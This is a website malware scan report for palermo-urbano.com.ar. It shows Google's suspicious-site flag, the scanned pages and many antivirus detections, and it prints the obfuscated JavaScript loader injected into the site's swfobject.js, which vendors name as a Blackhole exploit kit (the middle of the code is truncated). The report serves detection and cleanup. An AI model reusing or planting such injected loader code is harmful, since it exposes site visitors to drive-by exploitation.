New scan:

Malware Scanner report for palermo-urbano.com.ar

Malicious/Suspicious/Total urls checked
1/0/4
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "palermo-urbano.com.ar" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=palermo-urbano.com.ar

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.palermo-urbano.com.ar/
200 OK
Content-Length: 6949
Content-Type: text/html
clean
http://www.palermo-urbano.com.ar/Scripts/swfobject.js
200 OK
Content-Length: 11315
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)


iyr="s"+"p"+"li"+"t";ghr=window;doyzq="dy";qvr=document;mqecvu="0x";kdftts=(5-3-1);try{++(qvr.body)}catch(pgdmr){rkq=false;try{}catch(aeid){rkq=21;}if(1){dkm="17:5d:6c:65:5a:6b:60:66:65:17:61:67:6c:6c:6d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:
... 3797 bytes are skipped ...
60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:61:67:6c:6c:6d:27:30:1f:20:32:4:1:74:4:1:74"[iyr](":");}ghr=dkm;vca=[];for(gek=22-20-2;-gek+1433!=0;gek+=1){ubgl=gek;if((0x19==031))vca+=String["fromCharCode"](eval(mqecvu+ghr[1*ubgl])+0xa-kdftts);}tyi=eval;tyi(vca)}

Antivirus reports:

AntiVir
EXP/JS.Expack.GQ
Avast
JS:Decode-BML [Trj]
Ad-Aware
JS:Exploit.JS.Blacole.Z
Ikarus
Virus.JS.Exploit
nProtect
JS:Exploit.JS.Blacole.Z
Comodo
TrojWare.JS.Kryptik.acc
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Microsoft
Exploit:JS/Blacole.NX
Kaspersky
Exploit.JS.Pdfka.gkj
MicroWorld-eScan
JS:Exploit.JS.Blacole.Z
Fortinet
JS/Kryptik.AOG!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.cgxcgz
F-Secure
JS:Exploit.JS.Blacole.Z
VIPRE
Exploit.JS.Blacole.nx (v)
AVG
Script/Exploit.Kit
Norman
Kryptik.CCLX
GData
JS:Exploit.JS.Blacole.Z
ESET-NOD32
JS/Kryptik.AOG
BitDefender
JS:Exploit.JS.Blacole.Z

http://www.palermo-urbano.com.ar/test404page.js
HTTP/1.1 302 Object moved
Cache-Control: private
Date: Sat, 17 Jan 2015 23:22:30 GMT
Location: Brook
Server: Microsoft-IIS/7.0
Content-Length: 126
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACADTCSQ=BIFLFHHBKNJCIJOOKPEPHIMI; path=/
X-Powered-By: ASP.NET
clean
http://www.palermo-urbano.com.ar/brook
HTTP/1.1 302 Object moved
Cache-Control: private
Date: Sat, 17 Jan 2015 23:22:30 GMT
Location: Brook
Server: Microsoft-IIS/7.0
Content-Length: 126
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACADTCSQ=CIFLFHHBPOFCJLHMGEAEOMJD; path=/
X-Powered-By: ASP.NET
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: palermo-urbano.com.ar

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: palermo-urbano.com.ar
Referer: http://www.google.com/search?q=palermo-urbano.com.ar

Result:
The result is similar to the first query. There are no suspicious redirects found.